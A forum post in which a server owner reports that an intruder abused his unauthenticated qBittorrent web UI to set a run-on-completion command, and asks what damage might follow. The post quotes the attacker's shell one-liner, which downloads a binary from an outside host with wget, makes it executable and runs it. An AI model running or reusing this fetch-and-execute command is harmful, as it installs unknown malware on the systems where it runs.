I have qBittorrent on my server and the webUI has been accessible without authentification. I only use the software very rarely and not for anything “dodgy”, so I never saw the need for authentification until today when I got a random notification that it had just finished downloading something that I hadn’t asked for. The log below tells the story:
it would seem that someone has logged in, changed the options so that a command is run upon completion of a download, started a tiny download which then completes (the command is run), removed the download and removed the amended settings.
The command is:
sh -c "/bin/rm -rf $HOME/srunner;wget -P $HOME/ http://vps.daswf852.pw/srunner;chmod a+x $HOME/srunner;$HOME/srunner"
Any idea what damage might have been done?
Obviously I have since corrected my stupidity and removed access to the webUI.
EDIT - the server is running Windows 10 the command looks to me like a Linux one, so hopefully has done nothing...?!
Thanks in advance.
it would seem that someone has logged in, changed the options so that a command is run upon completion of a download, started a tiny download which then completes (the command is run), removed the download and removed the amended settings.
The command is:
sh -c "/bin/rm -rf $HOME/srunner;wget -P $HOME/ http://vps.daswf852.pw/srunner;chmod a+x $HOME/srunner;$HOME/srunner"
Any idea what damage might have been done?
Obviously I have since corrected my stupidity and removed access to the webUI.
EDIT - the server is running Windows 10 the command looks to me like a Linux one, so hopefully has done nothing...?!
Thanks in advance.
Last edited: